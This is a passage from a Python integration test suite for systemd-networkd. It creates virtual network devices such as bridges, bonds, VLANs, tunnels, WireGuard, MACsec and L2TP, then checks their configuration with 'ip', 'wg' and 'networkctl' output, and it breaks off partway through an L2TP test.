'25-wireguard.network',
'25-xfrm.netdev',
'25-xfrm-independent.netdev',
'6rd.network',
'erspan.network',
'gre.network',
'gretap.network',
'gretun.network',
'ip6gretap.network',
'ip6gretun.network',
'ip6tnl.network',
'ipip.network',
'ipvlan.network',
'ipvtap.network',
'isatap.network',
'macsec.network',
'macvlan.network',
'macvtap.network',
'netdev-link-local-addressing-yes.network',
'sit.network',
'vti6.network',
'vti.network',
'vxlan-test1.network',
'vxlan.network',
'xfrm.network',
]
fou_ports = [
'55555',
'55556']
def setUp(self):
remove_fou_ports(self.fou_ports)
remove_links(self.links_remove_earlier)
remove_links(self.links)
stop_networkd(show_logs=False)
def tearDown(self):
remove_fou_ports(self.fou_ports)
remove_links(self.links_remove_earlier)
remove_links(self.links)
remove_unit_from_networkd_path(self.units)
stop_networkd(show_logs=True)
def test_dropin_and_name_conflict(self):
copy_unit_to_networkd_unit_path('10-dropin-test.netdev', '15-name-conflict-test.netdev')
start_networkd()
self.wait_online(['dropin-test:off'], setup_state='unmanaged')
output = check_output('ip link show dropin-test')
print(output)
self.assertRegex(output, '00:50:56:c0:00:28')
def test_match_udev_property(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', '13-not-match-udev-property.network', '14-match-udev-property.network')
start_networkd()
self.wait_online(['dummy98:routable'])
output = check_output('networkctl status dummy98')
print(output)
self.assertRegex(output, 'Network File: /run/systemd/network/14-match-udev-property')
def test_wait_online_any(self):
copy_unit_to_networkd_unit_path('25-bridge.netdev', '25-bridge.network', '11-dummy.netdev', '11-dummy.network')
start_networkd()
self.wait_online(['bridge99', 'test1:degraded'], bool_any=True)
self.check_operstate('bridge99', '(off|no-carrier)', setup_state='configuring')
self.check_operstate('test1', 'degraded')
def test_bridge(self):
copy_unit_to_networkd_unit_path('25-bridge.netdev', '25-bridge-configure-without-carrier.network')
start_networkd()
self.wait_online(['bridge99:no-carrier'])
tick = os.sysconf('SC_CLK_TCK')
self.assertEqual(9, round(float(read_link_attr('bridge99', 'bridge', 'hello_time')) / tick))
self.assertEqual(9, round(float(read_link_attr('bridge99', 'bridge', 'max_age')) / tick))
self.assertEqual(9, round(float(read_link_attr('bridge99', 'bridge', 'forward_delay')) / tick))
self.assertEqual(9, round(float(read_link_attr('bridge99', 'bridge', 'ageing_time')) / tick))
self.assertEqual(9, int(read_link_attr('bridge99', 'bridge', 'priority')))
self.assertEqual(1, int(read_link_attr('bridge99', 'bridge', 'multicast_querier')))
self.assertEqual(1, int(read_link_attr('bridge99', 'bridge', 'multicast_snooping')))
self.assertEqual(1, int(read_link_attr('bridge99', 'bridge', 'stp_state')))
self.assertEqual(3, int(read_link_attr('bridge99', 'bridge', 'multicast_igmp_version')))
output = check_output(*networkctl_cmd, 'status', 'bridge99', env=env)
print(output)
self.assertRegex(output, 'Priority: 9')
self.assertRegex(output, 'STP: yes')
self.assertRegex(output, 'Multicast IGMP Version: 3')
def test_bond(self):
copy_unit_to_networkd_unit_path('25-bond.netdev', '25-bond-balanced-tlb.netdev')
start_networkd()
self.wait_online(['bond99:off', 'bond98:off'], setup_state='unmanaged')
self.assertEqual('802.3ad 4', read_link_attr('bond99', 'bonding', 'mode'))
self.assertEqual('layer3+4 1', read_link_attr('bond99', 'bonding', 'xmit_hash_policy'))
self.assertEqual('1000', read_link_attr('bond99', 'bonding', 'miimon'))
self.assertEqual('fast 1', read_link_attr('bond99', 'bonding', 'lacp_rate'))
self.assertEqual('2000', read_link_attr('bond99', 'bonding', 'updelay'))
self.assertEqual('2000', read_link_attr('bond99', 'bonding', 'downdelay'))
self.assertEqual('4', read_link_attr('bond99', 'bonding', 'resend_igmp'))
self.assertEqual('1', read_link_attr('bond99', 'bonding', 'min_links'))
self.assertEqual('1218', read_link_attr('bond99', 'bonding', 'ad_actor_sys_prio'))
self.assertEqual('811', read_link_attr('bond99', 'bonding', 'ad_user_port_key'))
self.assertEqual('00:11:22:33:44:55', read_link_attr('bond99', 'bonding', 'ad_actor_system'))
self.assertEqual('balance-tlb 5', read_link_attr('bond98', 'bonding', 'mode'))
self.assertEqual('1', read_link_attr('bond98', 'bonding', 'tlb_dynamic_lb'))
def test_vlan(self):
copy_unit_to_networkd_unit_path('21-vlan.netdev', '11-dummy.netdev',
'21-vlan.network', '21-vlan-test1.network')
start_networkd()
self.wait_online(['test1:degraded', 'vlan99:routable'])
output = check_output('ip -d link show test1')
print(output)
self.assertRegex(output, ' mtu 2000 ')
output = check_output('ip -d link show vlan99')
print(output)
self.assertRegex(output, ' mtu 2000 ')
self.assertRegex(output, 'REORDER_HDR')
self.assertRegex(output, 'LOOSE_BINDING')
self.assertRegex(output, 'GVRP')
self.assertRegex(output, 'MVRP')
self.assertRegex(output, ' id 99 ')
output = check_output('ip -4 address show dev test1')
print(output)
self.assertRegex(output, 'inet 192.168.24.5/24 brd 192.168.24.255 scope global test1')
self.assertRegex(output, 'inet 192.168.25.5/24 brd 192.168.25.255 scope global test1')
output = check_output('ip -4 address show dev vlan99')
print(output)
self.assertRegex(output, 'inet 192.168.23.5/24 brd 192.168.23.255 scope global vlan99')
def test_macvtap(self):
for mode in ['private', 'vepa', 'bridge', 'passthru']:
with self.subTest(mode=mode):
if mode != 'private':
self.tearDown()
copy_unit_to_networkd_unit_path('21-macvtap.netdev', 'netdev-link-local-addressing-yes.network',
'11-dummy.netdev', 'macvtap.network')
with open(os.path.join(network_unit_file_path, '21-macvtap.netdev'), mode='a') as f:
f.write('[MACVTAP]\nMode=' + mode)
start_networkd()
self.wait_online(['macvtap99:degraded', 'test1:degraded'])
output = check_output('ip -d link show macvtap99')
print(output)
self.assertRegex(output, 'macvtap mode ' + mode + ' ')
def test_macvlan(self):
for mode in ['private', 'vepa', 'bridge', 'passthru']:
with self.subTest(mode=mode):
if mode != 'private':
self.tearDown()
copy_unit_to_networkd_unit_path('21-macvlan.netdev', 'netdev-link-local-addressing-yes.network',
'11-dummy.netdev', 'macvlan.network')
with open(os.path.join(network_unit_file_path, '21-macvlan.netdev'), mode='a') as f:
f.write('[MACVLAN]\nMode=' + mode)
start_networkd()
self.wait_online(['macvlan99:degraded', 'test1:degraded'])
output = check_output('ip -d link show test1')
print(output)
self.assertRegex(output, ' mtu 2000 ')
output = check_output('ip -d link show macvlan99')
print(output)
self.assertRegex(output, ' mtu 2000 ')
self.assertRegex(output, 'macvlan mode ' + mode + ' ')
@expectedFailureIfModuleIsNotAvailable('ipvlan')
def test_ipvlan(self):
for mode, flag in [['L2', 'private'], ['L3', 'vepa'], ['L3S', 'bridge']]:
with self.subTest(mode=mode, flag=flag):
if mode != 'L2':
self.tearDown()
copy_unit_to_networkd_unit_path('25-ipvlan.netdev', 'netdev-link-local-addressing-yes.network',
'11-dummy.netdev', 'ipvlan.network')
with open(os.path.join(network_unit_file_path, '25-ipvlan.netdev'), mode='a') as f:
f.write('[IPVLAN]\nMode=' + mode + '\nFlags=' + flag)
start_networkd()
self.wait_online(['ipvlan99:degraded', 'test1:degraded'])
output = check_output('ip -d link show ipvlan99')
print(output)
self.assertRegex(output, 'ipvlan *mode ' + mode.lower() + ' ' + flag)
@expectedFailureIfModuleIsNotAvailable('ipvtap')
def test_ipvtap(self):
for mode, flag in [['L2', 'private'], ['L3', 'vepa'], ['L3S', 'bridge']]:
with self.subTest(mode=mode, flag=flag):
if mode != 'L2':
self.tearDown()
copy_unit_to_networkd_unit_path('25-ipvtap.netdev', 'netdev-link-local-addressing-yes.network',
'11-dummy.netdev', 'ipvtap.network')
with open(os.path.join(network_unit_file_path, '25-ipvtap.netdev'), mode='a') as f:
f.write('[IPVTAP]\nMode=' + mode + '\nFlags=' + flag)
start_networkd()
self.wait_online(['ipvtap99:degraded', 'test1:degraded'])
output = check_output('ip -d link show ipvtap99')
print(output)
self.assertRegex(output, 'ipvtap *mode ' + mode.lower() + ' ' + flag)
def test_veth(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'netdev-link-local-addressing-yes.network')
start_networkd()
self.wait_online(['veth99:degraded', 'veth-peer:degraded'])
output = check_output('ip -d link show veth99')
print(output)
self.assertRegex(output, 'link/ether 12:34:56:78:9a:bc')
output = check_output('ip -d link show veth-peer')
print(output)
self.assertRegex(output, 'link/ether 12:34:56:78:9a:bd')
def test_tun(self):
copy_unit_to_networkd_unit_path('25-tun.netdev')
start_networkd()
self.wait_online(['tun99:off'], setup_state='unmanaged')
output = check_output('ip -d link show tun99')
print(output)
# Old ip command does not support IFF_ flags
self.assertRegex(output, 'tun (type tun pi on vnet_hdr on multi_queue|addrgenmode) ')
def test_tap(self):
copy_unit_to_networkd_unit_path('25-tap.netdev')
start_networkd()
self.wait_online(['tap99:off'], setup_state='unmanaged')
output = check_output('ip -d link show tap99')
print(output)
# Old ip command does not support IFF_ flags
self.assertRegex(output, 'tun (type tap pi on vnet_hdr on multi_queue|addrgenmode) ')
@expectedFailureIfModuleIsNotAvailable('vrf')
def test_vrf(self):
copy_unit_to_networkd_unit_path('25-vrf.netdev', 'netdev-link-local-addressing-yes.network')
start_networkd()
self.wait_online(['vrf99:carrier'])
@expectedFailureIfModuleIsNotAvailable('vcan')
def test_vcan(self):
copy_unit_to_networkd_unit_path('25-vcan.netdev', 'netdev-link-local-addressing-yes.network')
start_networkd()
self.wait_online(['vcan99:carrier'])
@expectedFailureIfModuleIsNotAvailable('vxcan')
def test_vxcan(self):
copy_unit_to_networkd_unit_path('25-vxcan.netdev', 'netdev-link-local-addressing-yes.network')
start_networkd()
self.wait_online(['vxcan99:carrier', 'vxcan-peer:carrier'])
@expectedFailureIfModuleIsNotAvailable('wireguard')
def test_wireguard(self):
copy_unit_to_networkd_unit_path('25-wireguard.netdev', '25-wireguard.network',
'25-wireguard-23-peers.netdev', '25-wireguard-23-peers.network',
'25-wireguard-preshared-key.txt', '25-wireguard-private-key.txt')
start_networkd()
self.wait_online(['wg99:carrier', 'wg98:routable'])
if shutil.which('wg'):
call('wg')
output = check_output('wg show wg99 listen-port')
self.assertRegex(output, '51820')
output = check_output('wg show wg99 fwmark')
self.assertRegex(output, '0x4d2')
output = check_output('wg show wg99 allowed-ips')
self.assertRegex(output, r'RDf\+LSpeEre7YEIKaxg\+wbpsNV7du\+ktR99uBEtIiCA=\t192.168.26.0/24 fd31:bf08:57cb::/48')
self.assertRegex(output, r'lsDtM3AbjxNlauRKzHEPfgS1Zp7cp/VX5Use/P4PQSc=\tfdbc:bae2:7871:e1fe:793:8636::/96 fdbc:bae2:7871:500:e1fe:793:8636:dad1/128')
output = check_output('wg show wg99 persistent-keepalive')
self.assertRegex(output, r'RDf\+LSpeEre7YEIKaxg\+wbpsNV7du\+ktR99uBEtIiCA=\t20')
output = check_output('wg show wg99 endpoints')
self.assertRegex(output, r'RDf\+LSpeEre7YEIKaxg\+wbpsNV7du\+ktR99uBEtIiCA=\t192.168.27.3:51820')
output = check_output('wg show wg99 private-key')
self.assertRegex(output, r'EEGlnEPYJV//kbvvIqxKkQwOiS\+UENyPncC4bF46ong=')
output = check_output('wg show wg99 preshared-keys')
self.assertRegex(output, r'RDf\+LSpeEre7YEIKaxg\+wbpsNV7du\+ktR99uBEtIiCA= IIWIV17wutHv7t4cR6pOT91z6NSz/T8Arh0yaywhw3M=')
self.assertRegex(output, r'lsDtM3AbjxNlauRKzHEPfgS1Zp7cp/VX5Use/P4PQSc= cPLOy1YUrEI0EMMIycPJmOo0aTu3RZnw8bL5meVD6m0=')
output = check_output('wg show wg98 private-key')
self.assertRegex(output, r'CJQUtcS9emY2fLYqDlpSZiE/QJyHkPWr\+WHtZLZ90FU=')
def test_geneve(self):
copy_unit_to_networkd_unit_path('25-geneve.netdev', 'netdev-link-local-addressing-yes.network')
start_networkd()
self.wait_online(['geneve99:degraded'])
output = check_output('ip -d link show geneve99')
print(output)
self.assertRegex(output, '192.168.22.1')
self.assertRegex(output, '6082')
self.assertRegex(output, 'udpcsum')
self.assertRegex(output, 'udp6zerocsumrx')
def test_ipip_tunnel(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', 'ipip.network',
'25-ipip-tunnel.netdev', '25-tunnel.network',
'25-ipip-tunnel-local-any.netdev', '25-tunnel-local-any.network',
'25-ipip-tunnel-remote-any.netdev', '25-tunnel-remote-any.network',
'25-ipip-tunnel-any-any.netdev', '25-tunnel-any-any.network')
start_networkd()
self.wait_online(['ipiptun99:routable', 'ipiptun98:routable', 'ipiptun97:routable', 'ipiptun96:routable', 'dummy98:degraded'])
output = check_output('ip -d link show ipiptun99')
print(output)
self.assertRegex(output, 'ipip (ipip )?remote 192.169.224.239 local 192.168.223.238 dev dummy98')
output = check_output('ip -d link show ipiptun98')
print(output)
self.assertRegex(output, 'ipip (ipip )?remote 192.169.224.239 local any dev dummy98')
output = check_output('ip -d link show ipiptun97')
print(output)
self.assertRegex(output, 'ipip (ipip )?remote any local 192.168.223.238 dev dummy98')
output = check_output('ip -d link show ipiptun96')
print(output)
self.assertRegex(output, 'ipip (ipip )?remote any local any dev dummy98')
def test_gre_tunnel(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', 'gretun.network',
'25-gre-tunnel.netdev', '25-tunnel.network',
'25-gre-tunnel-local-any.netdev', '25-tunnel-local-any.network',
'25-gre-tunnel-remote-any.netdev', '25-tunnel-remote-any.network',
'25-gre-tunnel-any-any.netdev', '25-tunnel-any-any.network')
start_networkd()
self.wait_online(['gretun99:routable', 'gretun98:routable', 'gretun97:routable', 'gretun96:routable', 'dummy98:degraded'])
output = check_output('ip -d link show gretun99')
print(output)
self.assertRegex(output, 'gre remote 10.65.223.239 local 10.65.223.238 dev dummy98')
self.assertRegex(output, 'ikey 1.2.3.103')
self.assertRegex(output, 'okey 1.2.4.103')
self.assertRegex(output, 'iseq')
self.assertRegex(output, 'oseq')
output = check_output('ip -d link show gretun98')
print(output)
self.assertRegex(output, 'gre remote 10.65.223.239 local any dev dummy98')
self.assertRegex(output, 'ikey 0.0.0.104')
self.assertRegex(output, 'okey 0.0.0.104')
self.assertNotRegex(output, 'iseq')
self.assertNotRegex(output, 'oseq')
output = check_output('ip -d link show gretun97')
print(output)
self.assertRegex(output, 'gre remote any local 10.65.223.238 dev dummy98')
self.assertRegex(output, 'ikey 0.0.0.105')
self.assertRegex(output, 'okey 0.0.0.105')
self.assertNotRegex(output, 'iseq')
self.assertNotRegex(output, 'oseq')
output = check_output('ip -d link show gretun96')
print(output)
self.assertRegex(output, 'gre remote any local any dev dummy98')
self.assertRegex(output, 'ikey 0.0.0.106')
self.assertRegex(output, 'okey 0.0.0.106')
self.assertNotRegex(output, 'iseq')
self.assertNotRegex(output, 'oseq')
def test_ip6gre_tunnel(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', 'ip6gretun.network',
'25-ip6gre-tunnel.netdev', '25-tunnel.network',
'25-ip6gre-tunnel-local-any.netdev', '25-tunnel-local-any.network',
'25-ip6gre-tunnel-remote-any.netdev', '25-tunnel-remote-any.network',
'25-ip6gre-tunnel-any-any.netdev', '25-tunnel-any-any.network')
start_networkd(5)
# Old kernels seem not to support IPv6LL address on ip6gre tunnel, So please do not use wait_online() here.
self.check_link_exists('dummy98')
self.check_link_exists('ip6gretun99')
self.check_link_exists('ip6gretun98')
self.check_link_exists('ip6gretun97')
self.check_link_exists('ip6gretun96')
output = check_output('ip -d link show ip6gretun99')
print(output)
self.assertRegex(output, 'ip6gre remote 2001:473:fece:cafe::5179 local 2a00:ffde:4567:edde::4987 dev dummy98')
output = check_output('ip -d link show ip6gretun98')
print(output)
self.assertRegex(output, 'ip6gre remote 2001:473:fece:cafe::5179 local any dev dummy98')
output = check_output('ip -d link show ip6gretun97')
print(output)
self.assertRegex(output, 'ip6gre remote any local 2a00:ffde:4567:edde::4987 dev dummy98')
output = check_output('ip -d link show ip6gretun96')
print(output)
self.assertRegex(output, 'ip6gre remote any local any dev dummy98')
def test_gretap_tunnel(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', 'gretap.network',
'25-gretap-tunnel.netdev', '25-tunnel.network',
'25-gretap-tunnel-local-any.netdev', '25-tunnel-local-any.network')
start_networkd()
self.wait_online(['gretap99:routable', 'gretap98:routable', 'dummy98:degraded'])
output = check_output('ip -d link show gretap99')
print(output)
self.assertRegex(output, 'gretap remote 10.65.223.239 local 10.65.223.238 dev dummy98')
self.assertRegex(output, 'ikey 0.0.0.106')
self.assertRegex(output, 'okey 0.0.0.106')
self.assertRegex(output, 'iseq')
self.assertRegex(output, 'oseq')
output = check_output('ip -d link show gretap98')
print(output)
self.assertRegex(output, 'gretap remote 10.65.223.239 local any dev dummy98')
self.assertRegex(output, 'ikey 0.0.0.107')
self.assertRegex(output, 'okey 0.0.0.107')
self.assertRegex(output, 'iseq')
self.assertRegex(output, 'oseq')
def test_ip6gretap_tunnel(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', 'ip6gretap.network',
'25-ip6gretap-tunnel.netdev', '25-tunnel.network',
'25-ip6gretap-tunnel-local-any.netdev', '25-tunnel-local-any.network')
start_networkd()
self.wait_online(['ip6gretap99:routable', 'ip6gretap98:routable', 'dummy98:degraded'])
output = check_output('ip -d link show ip6gretap99')
print(output)
self.assertRegex(output, 'ip6gretap remote 2001:473:fece:cafe::5179 local 2a00:ffde:4567:edde::4987 dev dummy98')
output = check_output('ip -d link show ip6gretap98')
print(output)
self.assertRegex(output, 'ip6gretap remote 2001:473:fece:cafe::5179 local any dev dummy98')
def test_vti_tunnel(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', 'vti.network',
'25-vti-tunnel.netdev', '25-tunnel.network',
'25-vti-tunnel-local-any.netdev', '25-tunnel-local-any.network',
'25-vti-tunnel-remote-any.netdev', '25-tunnel-remote-any.network',
'25-vti-tunnel-any-any.netdev', '25-tunnel-any-any.network')
start_networkd()
self.wait_online(['vtitun99:routable', 'vtitun98:routable', 'vtitun97:routable', 'vtitun96:routable', 'dummy98:degraded'])
output = check_output('ip -d link show vtitun99')
print(output)
self.assertRegex(output, 'vti remote 10.65.223.239 local 10.65.223.238 dev dummy98')
output = check_output('ip -d link show vtitun98')
print(output)
self.assertRegex(output, 'vti remote 10.65.223.239 local any dev dummy98')
output = check_output('ip -d link show vtitun97')
print(output)
self.assertRegex(output, 'vti remote any local 10.65.223.238 dev dummy98')
output = check_output('ip -d link show vtitun96')
print(output)
self.assertRegex(output, 'vti remote any local any dev dummy98')
def test_vti6_tunnel(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', 'vti6.network',
'25-vti6-tunnel.netdev', '25-tunnel.network',
'25-vti6-tunnel-local-any.netdev', '25-tunnel-local-any.network',
'25-vti6-tunnel-remote-any.netdev', '25-tunnel-remote-any.network')
start_networkd()
self.wait_online(['vti6tun99:routable', 'vti6tun98:routable', 'vti6tun97:routable', 'dummy98:degraded'])
output = check_output('ip -d link show vti6tun99')
print(output)
self.assertRegex(output, 'vti6 remote 2001:473:fece:cafe::5179 local 2a00:ffde:4567:edde::4987 dev dummy98')
output = check_output('ip -d link show vti6tun98')
print(output)
self.assertRegex(output, 'vti6 remote 2001:473:fece:cafe::5179 local (any|::) dev dummy98')
output = check_output('ip -d link show vti6tun97')
print(output)
self.assertRegex(output, 'vti6 remote (any|::) local 2a00:ffde:4567:edde::4987 dev dummy98')
def test_ip6tnl_tunnel(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', 'ip6tnl.network',
'25-ip6tnl-tunnel.netdev', '25-tunnel.network',
'25-ip6tnl-tunnel-local-any.netdev', '25-tunnel-local-any.network',
'25-ip6tnl-tunnel-remote-any.netdev', '25-tunnel-remote-any.network')
start_networkd()
self.wait_online(['ip6tnl99:routable', 'ip6tnl98:routable', 'ip6tnl97:routable', 'dummy98:degraded'])
output = check_output('ip -d link show ip6tnl99')
print(output)
self.assertRegex(output, 'ip6tnl ip6ip6 remote 2001:473:fece:cafe::5179 local 2a00:ffde:4567:edde::4987 dev dummy98')
output = check_output('ip -d link show ip6tnl98')
print(output)
self.assertRegex(output, 'ip6tnl ip6ip6 remote 2001:473:fece:cafe::5179 local (any|::) dev dummy98')
output = check_output('ip -d link show ip6tnl97')
print(output)
self.assertRegex(output, 'ip6tnl ip6ip6 remote (any|::) local 2a00:ffde:4567:edde::4987 dev dummy98')
def test_sit_tunnel(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', 'sit.network',
'25-sit-tunnel.netdev', '25-tunnel.network',
'25-sit-tunnel-local-any.netdev', '25-tunnel-local-any.network',
'25-sit-tunnel-remote-any.netdev', '25-tunnel-remote-any.network',
'25-sit-tunnel-any-any.netdev', '25-tunnel-any-any.network')
start_networkd()
self.wait_online(['sittun99:routable', 'sittun98:routable', 'sittun97:routable', 'sittun96:routable', 'dummy98:degraded'])
output = check_output('ip -d link show sittun99')
print(output)
self.assertRegex(output, "sit (ip6ip )?remote 10.65.223.239 local 10.65.223.238 dev dummy98")
output = check_output('ip -d link show sittun98')
print(output)
self.assertRegex(output, "sit (ip6ip )?remote 10.65.223.239 local any dev dummy98")
output = check_output('ip -d link show sittun97')
print(output)
self.assertRegex(output, "sit (ip6ip )?remote any local 10.65.223.238 dev dummy98")
output = check_output('ip -d link show sittun96')
print(output)
self.assertRegex(output, "sit (ip6ip )?remote any local any dev dummy98")
def test_isatap_tunnel(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', 'isatap.network',
'25-isatap-tunnel.netdev', '25-tunnel.network')
start_networkd()
self.wait_online(['isataptun99:routable', 'dummy98:degraded'])
output = check_output('ip -d link show isataptun99')
print(output)
self.assertRegex(output, "isatap ")
def test_6rd_tunnel(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', '6rd.network',
'25-6rd-tunnel.netdev', '25-tunnel.network')
start_networkd()
self.wait_online(['sittun99:routable', 'dummy98:degraded'])
output = check_output('ip -d link show sittun99')
print(output)
self.assertRegex(output, '6rd-prefix 2602::/24')
@expectedFailureIfERSPANModuleIsNotAvailable()
def test_erspan_tunnel(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', 'erspan.network',
'25-erspan-tunnel.netdev', '25-tunnel.network',
'25-erspan-tunnel-local-any.netdev', '25-tunnel-local-any.network')
start_networkd()
self.wait_online(['erspan99:routable', 'erspan98:routable', 'dummy98:degraded'])
output = check_output('ip -d link show erspan99')
print(output)
self.assertRegex(output, 'erspan remote 172.16.1.100 local 172.16.1.200')
self.assertRegex(output, 'ikey 0.0.0.101')
self.assertRegex(output, 'okey 0.0.0.101')
self.assertRegex(output, 'iseq')
self.assertRegex(output, 'oseq')
output = check_output('ip -d link show erspan98')
print(output)
self.assertRegex(output, 'erspan remote 172.16.1.100 local any')
self.assertRegex(output, '102')
self.assertRegex(output, 'ikey 0.0.0.102')
self.assertRegex(output, 'okey 0.0.0.102')
self.assertRegex(output, 'iseq')
self.assertRegex(output, 'oseq')
def test_tunnel_independent(self):
copy_unit_to_networkd_unit_path('25-ipip-tunnel-independent.netdev', 'netdev-link-local-addressing-yes.network')
start_networkd()
self.wait_online(['ipiptun99:carrier'])
def test_tunnel_independent_loopback(self):
copy_unit_to_networkd_unit_path('25-ipip-tunnel-independent-loopback.netdev', 'netdev-link-local-addressing-yes.network')
start_networkd()
self.wait_online(['ipiptun99:carrier'])
@expectedFailureIfModuleIsNotAvailable('xfrm_interface')
def test_xfrm(self):
copy_unit_to_networkd_unit_path('12-dummy.netdev', 'xfrm.network',
'25-xfrm.netdev', 'netdev-link-local-addressing-yes.network')
start_networkd()
self.wait_online(['xfrm99:degraded', 'dummy98:degraded'])
output = check_output('ip link show dev xfrm99')
print(output)
@expectedFailureIfModuleIsNotAvailable('xfrm_interface')
def test_xfrm_independent(self):
copy_unit_to_networkd_unit_path('25-xfrm-independent.netdev', 'netdev-link-local-addressing-yes.network')
start_networkd()
self.wait_online(['xfrm99:degraded'])
@expectedFailureIfModuleIsNotAvailable('fou')
def test_fou(self):
# The following redundant check is necessary for CentOS CI.
# Maybe, error handling in lookup_id() in sd-netlink/generic-netlink.c needs to be updated.
self.assertTrue(is_module_available('fou'))
copy_unit_to_networkd_unit_path('25-fou-ipproto-ipip.netdev', '25-fou-ipproto-gre.netdev',
'25-fou-ipip.netdev', '25-fou-sit.netdev',
'25-fou-gre.netdev', '25-fou-gretap.netdev')
start_networkd()
self.wait_online(['ipiptun96:off', 'sittun96:off', 'gretun96:off', 'gretap96:off'], setup_state='unmanaged')
output = check_output('ip fou show')
print(output)
self.assertRegex(output, 'port 55555 ipproto 4')
self.assertRegex(output, 'port 55556 ipproto 47')
output = check_output('ip -d link show ipiptun96')
print(output)
self.assertRegex(output, 'encap fou encap-sport auto encap-dport 55555')
output = check_output('ip -d link show sittun96')
print(output)
self.assertRegex(output, 'encap fou encap-sport auto encap-dport 55555')
output = check_output('ip -d link show gretun96')
print(output)
self.assertRegex(output, 'encap fou encap-sport 1001 encap-dport 55556')
output = check_output('ip -d link show gretap96')
print(output)
self.assertRegex(output, 'encap fou encap-sport auto encap-dport 55556')
def test_vxlan(self):
copy_unit_to_networkd_unit_path('25-vxlan.netdev', 'vxlan.network',
'11-dummy.netdev', 'vxlan-test1.network')
start_networkd()
self.wait_online(['test1:degraded', 'vxlan99:degraded'])
output = check_output('ip -d link show vxlan99')
print(output)
self.assertRegex(output, '999')
self.assertRegex(output, '5555')
self.assertRegex(output, 'l2miss')
self.assertRegex(output, 'l3miss')
self.assertRegex(output, 'udpcsum')
self.assertRegex(output, 'udp6zerocsumtx')
self.assertRegex(output, 'udp6zerocsumrx')
self.assertRegex(output, 'remcsumtx')
self.assertRegex(output, 'remcsumrx')
self.assertRegex(output, 'gbp')
output = check_output('bridge fdb show dev vxlan99')
print(output)
self.assertRegex(output, '00:11:22:33:44:55 dst 10.0.0.5 self permanent')
self.assertRegex(output, '00:11:22:33:44:66 dst 10.0.0.6 self permanent')
self.assertRegex(output, '00:11:22:33:44:77 dst 10.0.0.7 self permanent')
output = check_output(*networkctl_cmd, 'status', 'vxlan99', env=env)
print(output)
self.assertRegex(output, 'VNI: 999')
self.assertRegex(output, 'Destination Port: 5555')
self.assertRegex(output, 'Underlying Device: test1')
def test_macsec(self):
copy_unit_to_networkd_unit_path('25-macsec.netdev', '25-macsec.network', '25-macsec.key',
'macsec.network', '12-dummy.netdev')
start_networkd()
self.wait_online(['dummy98:degraded', 'macsec99:routable'])
output = check_output('ip -d link show macsec99')
print(output)
self.assertRegex(output, 'macsec99@dummy98')
self.assertRegex(output, 'macsec sci [0-9a-f]*000b')
self.assertRegex(output, 'encrypt on')
output = check_output('ip macsec show macsec99')
print(output)
self.assertRegex(output, 'encrypt on')
self.assertRegex(output, 'TXSC: [0-9a-f]*000b on SA 1')
self.assertRegex(output, '0: PN [0-9]*, state on, key 01000000000000000000000000000000')
self.assertRegex(output, '1: PN [0-9]*, state on, key 02030000000000000000000000000000')
self.assertRegex(output, 'RXSC: c619528fe6a00100, state on')
self.assertRegex(output, '0: PN [0-9]*, state on, key 02030405000000000000000000000000')
self.assertRegex(output, '1: PN [0-9]*, state on, key 02030405060000000000000000000000')
self.assertRegex(output, '2: PN [0-9]*, state off, key 02030405060700000000000000000000')
self.assertRegex(output, '3: PN [0-9]*, state off, key 02030405060708000000000000000000')
self.assertNotRegex(output, 'key 02030405067080900000000000000000')
self.assertRegex(output, 'RXSC: 8c16456c83a90002, state on')
self.assertRegex(output, '0: PN [0-9]*, state off, key 02030400000000000000000000000000')
def test_nlmon(self):
copy_unit_to_networkd_unit_path('25-nlmon.netdev', 'netdev-link-local-addressing-yes.network')
start_networkd()
self.wait_online(['nlmon99:carrier'])
@expectedFailureIfModuleIsNotAvailable('ifb')
def test_ifb(self):
copy_unit_to_networkd_unit_path('25-ifb.netdev', 'netdev-link-local-addressing-yes.network')
start_networkd()
self.wait_online(['ifb99:degraded'])
class NetworkdL2TPTests(unittest.TestCase, Utilities):
links =[
'l2tp-ses1',
'l2tp-ses2',
'l2tp-ses3',
'l2tp-ses4',
'test1']
units = [
'11-dummy.netdev',
'25-l2tp-dummy.network',
'25-l2tp.network',
'25-l2tp-ip.netdev',
'25-l2tp-udp.netdev']
l2tp_tunnel_ids = [ '10' ]
def setUp(self):
remove_l2tp_tunnels(self.l2tp_tunnel_ids)
remove_links(self.links)
stop_networkd(show_logs=False)
def tearDown(self):
remove_l2tp_tunnels(self.l2tp_tunnel_ids)
remove_links(self.links)
remove_unit_from_networkd_path(self.units)
stop_networkd(show_logs=True)
@expectedFailureIfModuleIsNotAvailable('l2tp_eth')
def test_l2tp_udp(self):
copy_unit_to_networkd_unit_path('11-dummy.netdev', '25-l2tp-dummy.network',
'25-l2tp-udp.netdev', '25-l2tp.network')
start_networkd()
self.wait_online(['test1:routable', 'l2tp-ses1:degraded', 'l2tp-ses2:degraded'])
output = check_output('ip l2tp show tunnel tunnel_id 10')
print(output)
self.assertRegex(output, "Tunnel 10, encap UDP")
self.assertRegex(output, "From 192.168.30.100 to 192.168.30.101")
self.assertRegex(output, "Peer tunnel 11")
self.assertRegex(output, "UDP source / dest ports: 3000/4000")
self.assertRegex(output, "UDP checksum: enabled")
output = check_output('ip l2tp show session tid 10 session_id 15')
print(output)
self.assertRegex(output, "Session 15 in tunnel 10")
self.assertRegex(output, "Peer session 16, tunnel 11")
self.assertRegex(output, "interface name: l2tp-ses1")
output = check_output('ip l2tp show session tid 10 session_id 17')
print(output)
self.assertRegex(output, "Session 17 in tunnel 10")
self.assertRegex(output, "Peer session 18, tunnel 11")
self.assertRegex(output, "interface name: l2tp-ses2")
@expectedFailureIfModuleIsNotAvailable('l2tp_ip')
def test_l2tp_ip(self):
copy_unit_to_networkd_unit_path('11-dummy.netdev', '25-l2tp-dummy.network',
'25-l2tp-ip.netdev', '25-l2tp.network')
start_networkd()
